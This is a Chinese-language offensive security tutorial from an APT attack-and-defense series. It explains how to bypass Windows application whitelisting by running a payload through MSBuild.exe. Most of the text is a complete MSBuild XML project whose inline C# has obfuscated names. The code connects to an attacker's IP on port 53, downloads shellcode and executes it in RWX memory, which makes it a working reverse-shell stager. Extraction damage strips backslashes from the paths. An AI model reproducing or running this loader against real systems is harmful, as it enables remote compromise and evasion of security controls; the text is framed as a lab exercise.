第七十一課:基于白名單Msbuild.exe執(zhí)行payload第一季
專注APT攻擊與防御
https://micropoor.blogspot.com/
MSBuild簡介:
MSBuild是 Microsoft Build Engine 的縮寫,代表 Microsoft 和 Visual Studio 的新
的生成平臺。MSBuild 在如何處理和生成軟件方面是完全透明的,使開發(fā)人員能夠在未安裝
Visual Studio 的生成實驗室環(huán)境中組織和生成產(chǎn)品。
MSBuild 引入了一種新的基于 XML 的項目文件格式,這種格式容易理解、易于擴展并
且完全受 Microsoft 支持。MSBuild 項目文件的格式使開發(fā)人員能夠充分描述哪些項需要
生成,以及如何利用不同的平臺和配置生成這些項。
說明:Msbuild.exe所在路徑?jīng)]有被系統(tǒng)添加PATH環(huán)境變量中,因此,Msbuild命令無法識
別。
基于白名單MSBuild.exe配置payload:
Windows 7默認(rèn)位置為:C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe
攻擊機:192.168.1.4 Debian 靶機: 192.168.1.3 Windows 7
靶機執(zhí)行:
1 C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe Micropoor.xml
配置攻擊機msf:
附錄:Micropoor.xml
注:x86 payload
1 <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/develo
per/msbuild/2003">
2 <!‐‐ C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe SimpleT
asks.csproj Micropoor ‐‐>
3 <Target Name="iJEKHyTEjyCU">
4 <xUokfh />
5 </Target>
6 <UsingTask
7 TaskName="xUokfh"
8 TaskFactory="CodeTaskFactory"
9 AssemblyFile="C:WindowsMicrosoft.NetFrameworkv4.0.30319Microsof
t.Build.Tasks.v4.0.dll" >
10 <Task>
11
12 <Code Type="Class" Language="cs">
13 <![CDATA[
14 using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;
15 public class xUokfh : Task, ITask {
16 [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 ogephG,UInt32 fZZrvQ, UInt32 nDfrBaiPvDyeP, UInt32 LWITkrW);
17 [DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 qEVoJxknom, UInt32 gZyJBJWYQsnXkWe, UInt32jyIPELfKQYEVZM,IntPtr adztSLHGJiurGO, UInt32 vjSCprCJ, ref UInt32 KbPukprMQXUp);
18 [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr wVCIQGmqjONiM, UInt32 DFgVrE);
19 static byte[] VYcZlUehuq(string IJBRrBqhigjGAx, int XBUCexXIrGIEpe) {
20 IPEndPoint DRHsPzS = new IPEndPoint(IPAddress.Parse(IJBRrBqhigjGAx),XBUCexXIrGIEpe);
21 Socket zCoDOd = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
22 try { zCoDOd.Connect(DRHsPzS); }
23 catch { return null;}
24 byte[] OCrGofbbWRVsFEl = new byte[4];
25 zCoDOd.Receive(OCrGofbbWRVsFEl, 4, 0);
26 int auQJTjyxYw = BitConverter.ToInt32(OCrGofbbWRVsFEl, 0);
27 byte[] MlhacMDOKUAfvMX = new byte[auQJTjyxYw + 5];
28 int GFtbdD = 0;
29 while (GFtbdD < auQJTjyxYw)
30 { GFtbdD += zCoDOd.Receive(MlhacMDOKUAfvMX, GFtbdD + 5, (auQJTjyxYw ‐GFtbdD) < 4096 ? (auQJTjyxYw ‐ GFtbdD) : 4096, 0);}
31 byte[] YqBRpsmDUT = BitConverter.GetBytes((int)zCoDOd.Handle);
32 Array.Copy(YqBRpsmDUT, 0, MlhacMDOKUAfvMX, 1, 4); MlhacMDOKUAfvMX[0]= 0xBF;
33 return MlhacMDOKUAfvMX;}
34 static void NkoqFHncrcX(byte[] qLAvbAtan) {
35 if (qLAvbAtan != null) {
36 UInt32 jrYMBRkOAnqTqx = VirtualAlloc(0, (UInt32)qLAvbAtan.Length, 0x1000, 0x40);
37 Marshal.Copy(qLAvbAtan, 0, (IntPtr)(jrYMBRkOAnqTqx),qLAvbAtan.Length);
38 IntPtr WCUZoviZi = IntPtr.Zero;
39 UInt32 JhtJOypMKo = 0;
40 IntPtr UxebOmhhPw = IntPtr.Zero;
41 WCUZoviZi = CreateThread(0, 0, jrYMBRkOAnqTqx, UxebOmhhPw, 0, ref JhtJOypMKo);
42 WaitForSingleObject(WCUZoviZi, 0xFFFFFFFF); }}
43
44 public override bool Execute()
45 {
46 byte[] uABVbNXmhr = null; uABVbNXmhr = VYcZlUehuq("192.168.1.4", 53);
47 NkoqFHncrcX(uABVbNXmhr);
48
49 return true; } }
50 ]]>
51 </Code>
52 </Task>
53 </UsingTask>
54 </Project>
Micropoor
?
